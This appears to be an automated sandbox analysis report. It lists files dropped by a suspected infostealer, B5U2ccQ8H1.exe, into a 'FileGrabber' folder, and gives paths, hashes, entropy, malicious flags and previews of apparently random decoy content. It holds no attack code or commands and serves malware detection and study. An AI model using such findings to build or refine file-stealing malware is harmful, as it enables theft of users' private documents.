UFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	true
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\VLZDGUKUTZ\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\VLZDGUKUTZ\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\VLZDGUKUTZ\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	true
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\VLZDGUKUTZ\YPSIACHYXW.png

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\YPSIACHYXW.png

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\desktop.ini

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIM